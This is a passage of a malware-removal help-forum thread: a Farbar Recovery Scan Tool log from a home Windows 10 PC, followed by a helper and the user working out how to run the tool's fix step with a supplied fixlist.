ShellIconOverlayIdentifiers-x32: [   DropboxExt06] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt07] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt08] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt09] -> {FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
ShellIconOverlayIdentifiers-x32: [   DropboxExt10] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => C:\Program Files (x86)\Dropbox\Client\DropboxExt.8.0.dll [2017-01-05] (Dropbox, Inc.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\HP Digital Imaging Monitor.lnk [2016-06-04]
ShortcutTarget: HP Digital Imaging Monitor.lnk -> C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe (Hewlett-Packard Co.)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\14d3a.lnk [2017-01-13]
ShortcutTarget: 14d3a.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2a0f0a9d.lnk [2017-01-13]
ShortcutTarget: 2a0f0a9d.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8a6b2.lnk [2016-09-26]
ShortcutTarget: 8a6b2.lnk -> C:\Windows\System32\mshta.exe (Microsoft Corporation)
Startup: C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f943f.lnk [2016-10-11]
ShortcutTarget: f943f.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Restriction - Chrome <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{b9a91879-cca5-4abf-b5c9-de12170b6992}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.google.com
HKU\S-1-5-21-2694957348-435827945-4273115747-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?gws_rd=ssl

FireFox:
========
FF ProfilePath: C:\Users\Dorraine\AppData\Roaming\Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 [2017-01-13]
FF Homepage: Mozilla\Firefox\Profiles\a5d36r4c.default-1474997185436 -> hxxp://my.xfinity.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_24_0_0_194.dll [2017-01-11] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWoW64\Macromed\Flash\NPSWF32_24_0_0_194.dll [2017-01-11] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2016-12-23] (Adobe Systems Inc.)

Chrome:
=======
CHR Profile: C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default [2016-09-27]
CHR Extension: (Google Slides) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-09-29]
CHR Extension: (Google Docs) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-09-29]
CHR Extension: (Google Drive) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-09-27]
CHR Extension: (YouTube) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-29]
CHR Extension: (Google Search) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-09-29]
CHR Extension: (Google Sheets) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-09-29]
CHR Extension: (Google Docs Offline) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-09-27]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-09-27]
CHR Extension: (Gmail) - C:\Users\Dorraine\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-09-29]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 !SASCORE; C:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-04] (Dropbox, Inc.)
R2 DbxSvc; C:\WINDOWS\system32\DbxSvc.exe [51504 2017-01-05] (Dropbox, Inc.)
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [71680 2010-08-06] (Hewlett-Packard) [File not signed]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [89600 2010-08-06] (Hewlett-Packard) [File not signed]
S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [7032080 2016-05-12] (TeamViewer GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S4 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.1.6.0\WsAppService.exe [388608 2016-01-28] (Wondershare) [File not signed]

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S2 avgntflt; C:\Windows\SysWOW64\DRIVERS\avgntflt.sys [144664 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avipbb; C:\Windows\SysWOW64\DRIVERS\avipbb.sys [154392 2016-08-18] (Avira Operations GmbH & Co. KG)
S1 avkmgr; C:\Windows\SysWOW64\DRIVERS\avkmgr.sys [35488 2016-08-18] (Avira Operations GmbH & Co. KG)
R3 dot4; C:\WINDOWS\system32\DRIVERS\Dot4.sys [151968 2012-09-25] (Windows ® Win 7 DDK provider)
R3 Dot4Print; C:\WINDOWS\System32\drivers\Dot4Prt.sys [27040 2012-09-25] (Windows ® Win 7 DDK provider)
S3 k57nd; C:\WINDOWS\System32\DRIVERS\k57amd64.sys [356392 2011-10-25] (Broadcom Corporation)
R1 MpKsl6a09507e; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{4103C44F-CA46-4694-98B9-8BBA28983EE5}\MpKsl6a09507e.sys [44928 2017-01-12] (Microsoft Corporation)
S3 NetAdapterCx; C:\WINDOWS\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R1 SASDIFSV; C:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
R1 SASKUTIL; C:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 WsAudioDevice_383S(1); C:\WINDOWS\System32\drivers\WsAudioDevice_383S(1).sys [29288 2015-07-30] (Wondershare)
S3 dbx; system32\DRIVERS\dbx.sys [X]
U3 idsvc; no ImagePath

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-11 17:07 - 2017-01-11 17:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-01-11 14:28 - 2017-01-11 14:28 - 00006133 _____ C:\Users\Dorraine\Downloads\System Idle Process.txt
2017-01-11 14:23 - 2017-01-13 12:24 - 00001510 _____ C:\Users\Dorraine\Desktop\Process Explorer.lnk
2017-01-11 14:23 - 2017-01-11 14:25 - 02720928 _____ (Sysinternals - www.sysinternals.com) C:\Users\Dorraine\Downloads\procexp.exe
2017-01-11 14:17 - 2017-01-11 14:20 - 00041990 _____ C:\Users\Dorraine\Downloads\Addition.txt
2017-01-11 14:15 - 2017-01-13 20:33 - 00015911 _____ C:\Users\Dorraine\Downloads\FRST.txt
2017-01-11 14:09 - 2017-01-11 14:12 - 00013106 _____ C:\VEW.txt
2017-01-11 14:04 - 2017-01-11 14:12 - 00001470 _____ C:\Users\Dorraine\Desktop\VEW.lnk
2017-01-11 14:04 - 2017-01-11 14:05 - 00061440 _____ ( ) C:\Users\Dorraine\Downloads\VEW.exe
2017-01-11 12:17 - 2017-01-13 20:28 - 00000000 ____D C:\Users\Dorraine\Downloads\FRST-OlderVersion
2017-01-11 02:26 - 2017-01-11 02:26 - 20358232 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerInstaller.exe
2017-01-11 01:55 - 2017-01-11 14:14 - 00001015 _____ C:\Users\Dorraine\Desktop\FRST64.lnk
2017-01-11 01:52 - 2017-01-13 20:30 - 00000000 ____D C:\FRST
2017-01-11 01:51 - 2017-01-13 20:28 - 02419200 _____ (Farbar) C:\Users\Dorraine\Downloads\FRST64.exe
2017-01-05 19:04 - 2017-01-05 19:04 - 00051504 _____ (Dropbox, Inc.) C:\WINDOWS\system32\DbxSvc.exe
2017-01-05 18:48 - 2017-01-05 18:48 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-stable.sys
2017-01-05 18:48 - 2017-01-05 18:48 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-dev.sys
2017-01-05 18:48 - 2017-01-05 18:48 - 00075888 _____ (Dropbox, Inc.) C:\WINDOWS\system32\Drivers\dbx-canary.sys
2016-12-31 19:46 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Documents\MVI_3884_x264.mp4
2016-12-31 19:38 - 2016-12-31 19:46 - 26557621 _____ C:\Users\Dorraine\Downloads\MVI_3884_x264.mp4
2016-12-31 19:33 - 2016-12-24 23:26 - 1440503384 _____ C:\Users\Dorraine\Documents\MVI_3884.MOV
2016-12-31 19:30 - 2016-12-31 18:33 - 12477637 _____ C:\Users\Dorraine\Documents\MVI_3886_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:26 - 18908883 _____ C:\Users\Dorraine\Documents\MVI_3883_x264.mp4
2016-12-31 19:30 - 2016-12-31 18:19 - 14543355 _____ C:\Users\Dorraine\Documents\MVI_3885_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:57 - 23483944 _____ C:\Users\Dorraine\Documents\MVI_3888_x264.mp4
2016-12-31 19:30 - 2016-12-31 17:47 - 15521466 _____ C:\Users\Dorraine\Documents\MVI_3887_x264.mp4
2016-12-31 17:35 - 2016-12-31 17:36 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming\Anvsoft
2016-12-31 17:35 - 2016-12-31 17:35 - 00001272 _____ C:\Users\Dorraine\Desktop\Any Video Converter.lnk
2016-12-31 17:35 - 2016-12-31 17:35 - 00000000 ____D C:\Users\Dorraine\Documents\Any Video Converter
2016-12-31 17:33 - 2016-12-31 17:33 - 00000000 ____D C:\Program Files (x86)\Anvsoft
2016-12-31 17:29 - 2016-12-31 17:30 - 51282968 _____ C:\Users\Dorraine\Downloads\avc-free.exe
2016-12-16 15:55 - 2016-12-16 15:56 - 00000000 ____D C:\Users\Dorraine\AppData\Local\0bdc3b3d63
2016-12-16 15:23 - 2016-12-16 15:23 - 00000000 ____D C:\Users\Dorraine\AppData\Local\7df78865

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-01-13 20:14 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-01-13 20:13 - 2016-07-16 06:47 - 00000000 ___HD C:\Program Files\WindowsApps
2017-01-13 12:05 - 2016-09-26 19:47 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-01-12 21:02 - 2015-09-29 08:10 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-01-12 14:36 - 2016-10-08 16:10 - 00051443 _____ C:\Users\Dorraine\Documents\Community Chapel Baptist Church Bulletin, Page 1.odt
2017-01-11 22:40 - 2016-11-15 17:55 - 00000000 ____D C:\Users\Dorraine\AppData\LocalLow\Mozilla
2017-01-11 21:46 - 2016-06-04 16:12 - 00001706 _____ C:\Users\Dorraine\Desktop\Weather.lnk
2017-01-11 21:39 - 2016-06-04 14:53 - 00001616 _____ C:\Users\Dorraine\Desktop\Pictures.lnk
2017-01-11 21:37 - 2016-09-26 20:06 - 00004562 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task
2017-01-11 17:08 - 2015-10-17 21:34 - 00000000 ___RD C:\Users\Dorraine\Dropbox
2017-01-11 17:07 - 2015-10-17 20:54 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-01-11 14:12 - 2016-07-16 06:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-01-11 13:18 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine
2017-01-11 13:17 - 2016-09-26 20:07 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-01-11 13:17 - 2015-09-29 08:09 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-01-11 13:16 - 2016-07-16 01:04 - 00786432 _____ C:\WINDOWS\system32\config\BBI
2017-01-11 02:26 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-01-11 02:26 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-01-09 21:26 - 2016-06-04 17:02 - 00000887 _____ C:\Users\Dorraine\Desktop\Networdz.lnk
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\ProgramData\TEMP
2017-01-03 12:28 - 2015-09-30 08:16 - 00000000 ____D C:\Program Files (x86)\SpywareBlaster
2016-12-31 17:40 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Videos
2016-12-31 17:35 - 2016-09-26 19:51 - 00000000 ____D C:\Users\Dorraine\AppData\Roaming
2016-12-31 17:33 - 2016-07-16 01:04 - 00000000 ___RD C:\Program Files (x86)
2016-12-31 16:36 - 2016-07-16 06:45 - 00000000 ____D C:\WINDOWS\INF
2016-12-27 20:19 - 2016-06-24 10:36 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2016-12-24 15:02 - 2016-11-15 14:32 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2016-12-22 23:43 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Drivers\UMDF
2016-12-21 23:57 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\Pictures
2016-12-16 15:23 - 2015-09-28 14:14 - 00000000 ___RD C:\Users\Dorraine\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
2016-12-15 21:51 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\Microsoft.NET
2016-12-15 21:32 - 2016-07-16 06:47 - 00000000 ___RD C:\WINDOWS\assembly
2016-12-15 11:43 - 2016-09-26 19:50 - 00524288 ___SH C:\WINDOWS\system32\config\COMPONENTS{f5b135e6-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000002.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00524288 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TMContainer00000000000000000001.regtrans-ms
2016-12-14 19:19 - 2016-09-26 19:46 - 00225032 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2016-12-14 19:19 - 2016-09-26 19:46 - 00065536 ___SH C:\WINDOWS\system32\config\DRIVERS{f5b135f1-4b48-11e6-80cb-e41d2d012050}.TM.blf
2016-12-14 19:18 - 2016-07-16 06:47 - 00000796 ___SH C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\SysWOW64\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\en-US
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\system32\Boot
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\ShellExperiences
2016-12-14 19:18 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\AppPatch
2016-12-14 19:18 - 2016-07-16 01:04 - 00000000 ____D C:\WINDOWS\system32\DriverStore
2016-12-14 06:06 - 2016-07-16 06:47 - 00000000 ____D C:\WINDOWS\rescache
2016-12-14 05:57 - 2015-09-28 15:17 - 00000000 ____D C:\WINDOWS\system32\MRT
2016-12-14 05:55 - 2015-09-28 15:17 - 135632432 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe

==================== Files in the root of some directories =======

2016-05-17 16:14 - 2016-05-26 23:14 - 0000145 _____ () C:\Users\Dorraine\AppData\Roaming\WB.CFG
2015-10-01 15:14 - 2016-10-13 15:10 - 0013271 _____ () C:\ProgramData\hpzinstall.log
2016-05-17 14:51 - 2016-05-17 14:51 - 0000016 _____ () C:\ProgramData\mntemp
2016-05-17 14:51 - 2016-05-17 14:51 - 0004131 _____ () C:\ProgramData\rxsmznjf.zcp

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2016-12-11 20:57

==================== End of FRST.txt ============================

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 12-01-2017
Ran by Dorraine (13-01-2017 20:35:56)
Running from C:\Users\Dorraine\Downloads
Windows 10 Home Version 1607 (X64) (2016-09-27 01:10:09)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-2694957348-435827945-4273115747-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2694957348-435827945-4273115747-503 - Limited - Disabled)
Dorraine (S-1-5-21-2694957348-435827945-4273115747-1000 - Administrator - Enabled) => C:\Users\Dorraine
Guest (S-1-5-21-2694957348-435827945-4273115747-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

64 Bit HP CIO Components Installer (Version: 7.2.8 - Hewlett-Packard) Hidden
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20053 - Adobe Systems Incorporated)
Adobe Flash Player 24 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 24.0.0.194 - Adobe Systems Incorporated)
Any Video Converter 6.0.7 (HKLM-x32\...\Any Video Converter) (Version: 6.0.7 - Anvsoft)
BufferChm (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Copy (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
Defraggler (HKLM\...\Defraggler) (Version: 2.19 - Piriform)
Destinations (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
DeviceDiscovery (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
DJ_AIO_03_F2200_Software_Min (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
DocProc (x32 Version: 140.0.185.000 - Hewlett-Packard) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 17.4.33 - Dropbox, Inc.)
Dropbox Update Helper (x32 Version: 1.3.59.1 - Dropbox, Inc.) Hidden
F2200 (x32 Version: 140.0.425.000 - Hewlett-Packard) Hidden
GPBaseService2 (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
Hearts Screen Saver (HKLM-x32\...\Hearts) (Version:  - )
HP Customer Participation Program 14.0 (HKLM\...\HPExtendedCapabilities) (Version: 14.0 - HP)
HP Deskjet F2200 All-In-One Driver Software 14.0 Rel. 6 (HKLM\...\{60D6AAC5-FDC1-49BA-867B-3135F4726156}) (Version: 14.0 - HP)
HP Imaging Device Functions 14.0 (HKLM\...\HP Imaging Device Functions) (Version: 14.0 - HP)
HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.2024 - HP Photo Creations Powered by RocketLife)
HP Solution Center 14.0 (HKLM\...\HP Solution Center & Imaging Support Tools) (Version: 14.0 - HP)
HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)
HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden
HPPhotoGadget (x32 Version: 140.0.524.000 - Hewlett-Packard) Hidden
HPProductAssistant (x32 Version: 140.0.298.000 - Hewlett-Packard) Hidden
MarketResearch (x32 Version: 140.0.212.000 - Hewlett-Packard) Hidden
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
mIRC (HKLM-x32\...\mIRC) (Version: 7.43 - mIRC Co. Ltd.)
Mozilla Firefox 50.1.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 50.1.0 (x86 en-US)) (Version: 50.1.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 50.1.0.6186 - Mozilla)
MSXML 4.0 SP2 (KB954430) (HKLM-x32\...\{86493ADD-824D-4B8E-BD72-8C5DCDC52A71}) (Version: 4.20.9870.0 - Microsoft Corporation)
MSXML 4.0 SP2 (KB973688) (HKLM-x32\...\{F662A8E6-F4DC-41A2-901E-8C11F044BDEC}) (Version: 4.20.9876.0 - Microsoft Corporation)
NewFreeScreensaver nfsSnowGlobe2 (HKLM-x32\...\Snow Globe 2 New Free Screensaver_is1) (Version:  - NewFreeScreensavers.com)
OCR Software by I.R.I.S. 14.0 (HKLM\...\HPOCR) (Version: 14.0 - HP)
OpenOffice 4.1.2 (HKLM-x32\...\{E6AD67BB-1C33-4AB3-A387-E0D48137AB70}) (Version: 4.12.9782 - Apache Software Foundation)
Scan (x32 Version: 140.0.253.000 - Hewlett-Packard) Hidden
SolutionCenter (x32 Version: 140.0.299.000 - Hewlett-Packard) Hidden
Spotify (HKU\S-1-5-21-2694957348-435827945-4273115747-1000\...\Spotify) (Version: 1.0.28.87.g8f9312a4 - Spotify AB)
SpywareBlaster 5.5 (HKLM-x32\...\SpywareBlaster_is1) (Version: 5.5.0 - BrightFort LLC)
Status (x32 Version: 140.0.342.000 - Hewlett-Packard) Hidden
SUPERAntiSpyware (HKLM\...\{CDDCBBF1-2703-46BC-938B-BCC81A1EEAAA}) (Version: 6.0.1206 - SUPERAntiSpyware.com)
TeamViewer 11 (HKLM-x32\...\TeamViewer) (Version: 11.0.59518 - TeamViewer)
Toolbox (x32 Version: 140.0.596.000 - Hewlett-Packard) Hidden
TrayApp (x32 Version: 140.0.297.000 - Hewlett-Packard) Hidden
WebReg (x32 Version: 140.0.297.017 - Hewlett-Packard) Hidden
Windows Driver Package - Broadcom (k57nd) Net  (05/10/2011 14.8.0.5) (HKLM\...\6629B48C523118E251A0FF9A803F20EC1B1A9344) (Version: 05/10/2011 14.8.0.5 - Broadcom)
Windows Driver Package - Broadcom (k57nd60a) Net  (08/25/2012 15.4.0.9) (HKLM\...\E6C66B158167F5F97E7C3CC032E8B9CF807548D1) (Version: 08/25/2012 15.4.0.9 - Broadcom)

==================== Custom CLSID (Whitelisted): ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{087B3AE3-E237-4467-B8DB-5A38AB959AC9}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{3B092F0C-7696-40E3-A80F-68D74DA84210}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{63542C48-9552-494A-84F7-73AA6A7C99C1}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{7BC0E710-5703-45BE-A29D-5D46D8B39262}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\ooofilt_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{AE424E85-F6DF-4910-A6A9-438797986431}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\propertyhdl_x64.dll (Apache Software Foundation)
CustomCLSID: HKU\S-1-5-21-2694957348-435827945-4273115747-1000_Classes\CLSID\{C52AF81D-F7A0-4AAB-8E87-F80A60CCD396}\InprocServer32 -> C:\Program Files (x86)\OpenOffice 4\program\shlxthdl\shlxthdl_x64.dll (Apache Software Foundation)

==================== Scheduled Tasks (Whitelisted) =============


  • 0

Advertisements


#11
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

No that's not what I want.  If you start up FRST and then just hit the FIX button what happens?  Do not touch the SCAN button.


  • 0

#12
preacherswife

preacherswife

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 193 posts

It says No fixlist.txt found.

The fixlist.txt should be in the same folder/directory the took is located.


  • 0

#13
RKinner

RKinner

    Malware Expert

  • Expert
  • 24,598 posts
  • MVP

OK.  Download this one and try it again.

 

[attachment=83521:fixlist.txt]

 

 


  • 0

#14
preacherswife

preacherswife

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 193 posts

I think I am back to the very beginning.  You told me to d/l fixlist.  Here is what I did...

 

I left clicked on it and the message was...you have chosen to open:  fixlist.txt  The default was notepad.  I clicked ok.  From there, the notepad with all of the info below appeared.  I copied it and pasted it.  That is all I know to do.  I am truly sorry I am not able to do this.  I feel very bad for not being able to do what seems such a simple step. 

 

 

